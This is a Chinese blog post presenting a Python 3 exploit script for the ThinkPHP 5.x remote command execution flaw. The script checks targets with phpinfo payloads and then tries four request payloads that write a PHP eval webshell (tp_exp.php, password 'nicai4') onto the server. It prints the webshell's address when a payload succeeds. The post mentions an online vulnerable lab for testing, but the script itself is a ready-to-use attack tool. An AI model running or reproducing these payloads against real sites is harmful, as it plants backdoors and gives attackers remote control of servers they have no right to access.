python3编写ThinkPHP命令执行Getshell的方法


Posted in Python onFebruary 26, 2019

加了三个验证漏洞以及四个getshell方法

# /usr/bin/env python3
# -*- coding: utf-8 -*-
# @Author: Morker
# @Email: [email]admin@nsf.me[/email]
# @Blog:  [url]http://nsf.me/[/url]
 
import requests
import sys
 
def demo():
  print(' _______ _   _    _  _____ _  _ _____ ')
  print(' |__  __| |  (_)   | | | __ \| | | | __ \ ')
  print('  | | | |__ _ _ __ | | _| |__) | |__| | |__) |')
  print('''  | | | '_ \| | '_ \| |/ / ___/| __ | ___/ ''')
  print('  | | | | | | | | | |  <| |  | | | | |   ')
  print('  |_| |_| |_|_|_| |_|_|\_\_|  |_| |_|_|   ')
  print()
  print('\tThinkPHP 5.x (v5.0.23 and v5.1.31 following version).')
  print('\tRemote command execution exploit.')
  print('\tVulnerability verification and getshell.')
  print('\tTarget: http://target/public')
  print()
class ThinkPHP():
  def __init__(self,web):
    self.web = web
    self.headers = {
    "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0",
    "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language" : "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding" : "gzip, deflate",
    "Content-Type" : "application/x-www-form-urlencoded",
    "Connection" : "keep-alive"
    }
 
  def verification(self):
    i = 0
    s = 0
    verifications = ['/?s=index/\\think\Request/input&filter=phpinfo&data=1','/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1','/?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1']
    while True:
      if i == len(verifications):
        break
      else:
        url = self.web + verifications[i]
        req = requests.get(url=url,headers=self.headers)
        if 'phpinfo()' in req.text:
          s = 1
          break
        else:
          s = 0
        i += 1
    if s == 1:
      print("[+] There are vulnerabilities.")
      print()
      toshell = input("[*] Getshell? (y/n):")
      if toshell == 'y':
        self.getshell()
      elif toshell == 'n':
        sys.exit()
      else:
        sys.exit()
    else:
      print("[-] There are no vulnerabilities.")
 
  def getshell(self):
    getshells = [
    '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=tp_exp.php&vars[1][]=<?php @eval($_POST[nicai4]); ?>',
    '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20@eval($_POST[nicai4]);%20?>%27%20>>%20tp_exp.php',
    '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20@eval($_POST[nicai4]);%20?^>%20>>tp_exp.php',
    '?s=index/\\think\\template\driver\\file/write&cacheFile=tp_exp.php&content=<?php%20eval($_POST[nicai4]);?>']
    shell = self.web + '/tp_exp.php'
    i = 0
    s = 0
    while True:
      if i == len(getshells):
        break
      else:
        url = self.web + getshells[i]
        req = requests.get(url=url,headers=self.headers)
        req_shell = requests.get(url=shell,headers=self.headers)
        if req_shell.status_code == 200:
          s = 1
          break
        else:
          s = 0
        i += 1
    if s == 1:
      print("[+] WebShell :%s PassWord :nicai4" % shell)
    else:
      print("[-] The vulnerability does not exist or exists waf.")
 
def main():
  demo()
  url = input("[*] Please input your target: ")
  run = ThinkPHP(url)
  run.verification()
 
if __name__ == '__main__':
  main()

注:图中的测试网址为在线漏洞环境,可自己去在线搭建测试。

环境地址:https://www.vsplate.com/

效果图:

python3编写ThinkPHP命令执行Getshell的方法

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持三水点靠木。

Python 相关文章推荐
Python实现的RSS阅读器实例
Jul 25 Python
Python的Django框架中使用SQLAlchemy操作数据库的教程
Jun 02 Python
浅谈python字符串方法的简单使用
Jul 18 Python
python itchat实现微信好友头像拼接图的示例代码
Aug 14 Python
python3基于TCP实现CS架构文件传输
Jul 28 Python
浅谈Python脚本开头及导包注释自动添加方法
Oct 27 Python
python读取txt文件中特定位置字符的方法
Dec 24 Python
在Python中关于使用os模块遍历目录的实现方法
Jan 03 Python
python3 反射的四种基本方法解析
Aug 26 Python
python 实现多线程下载视频的代码
Nov 15 Python
python中pandas库中DataFrame对行和列的操作使用方法示例
Jun 14 Python
python中24小时制转换为12小时制的方法
Jun 18 Python
初探利用Python进行图文识别(OCR)
Feb 26 #Python
Python编写合并字典并实现敏感目录的小脚本
Feb 26 #Python
Python实现监控Nginx配置文件的不同并发送邮件报警功能示例
Feb 26 #Python
利用python实现对web服务器的目录探测的方法
Feb 26 #Python
python selenium 弹出框处理的实现
Feb 26 #Python
python实现学员管理系统
Feb 26 #Python
python实现电子产品商店
Feb 26 #Python
You might like
WordPress过滤垃圾评论的几种主要方法小结
2016/07/11 PHP
PHP的RSA加密解密方法以及开发接口使用
2018/02/11 PHP
PHP精确到毫秒秒杀倒计时实例详解
2019/03/14 PHP
网站上面有这种切换效果
2006/06/26 Javascript
最佳JS代码编写的14条技巧
2011/01/09 Javascript
基于jquery的图片轮播 tab切换组件
2012/07/19 Javascript
jquery实现可点击伸缩与展开的菜单效果代码
2015/08/31 Javascript
jQuery简单实现点击文本框复制内容到剪贴板上的方法
2016/08/01 Javascript
微信小程序 wxapp内容组件 progress详细介绍
2016/10/31 Javascript
拖动时防止选中
2017/02/03 Javascript
bootstrap vue.js实现tab效果
2017/02/07 Javascript
js实现省份下拉菜单效果
2017/02/15 Javascript
Vue单文件组件基础模板小结
2017/08/10 Javascript
vue实现验证码按钮倒计时功能
2018/04/10 Javascript
vue 移动端适配方案详解
2018/11/15 Javascript
Vue自定义属性实例分析
2019/02/23 Javascript
浅谈Node 异步IO和事件循环
2019/05/05 Javascript
js常用正则表达式集锦
2019/05/17 Javascript
jquery添加div实现消息聊天框
2020/02/08 jQuery
[08:02]DOTA2牵红线 zhou神抱得美人归
2014/03/22 DOTA
[02:56]《DAC最前线》之国外战队抵达上海备战亚洲邀请赛
2015/01/28 DOTA
python使用pymysql实现操作mysql
2016/09/13 Python
python 简单的绘图工具turtle使用详解
2017/06/21 Python
python中reload(module)的用法示例详解
2017/09/15 Python
在python中利用KNN实现对iris进行分类的方法
2018/12/11 Python
Python Pexpect库的简单使用方法
2019/01/29 Python
Python3解释器知识点总结
2019/02/19 Python
Python3使用xml.dom.minidom和xml.etree模块儿解析xml文件封装函数的方法
2019/09/23 Python
python实现两个字典合并,两个list合并
2019/12/02 Python
英国假发网站:Hothair
2018/02/23 全球购物
资产评估专业学生的自我鉴定
2013/11/14 职场文书
通信工程毕业生求职信
2013/11/16 职场文书
乡镇平安建设汇报材料
2014/08/25 职场文书
《月球之谜》教学反思
2016/02/20 职场文书
关于Numpy之repeat、tile的用法总结
2021/06/02 Python
Go语言设计模式之结构型模式
2021/06/22 Golang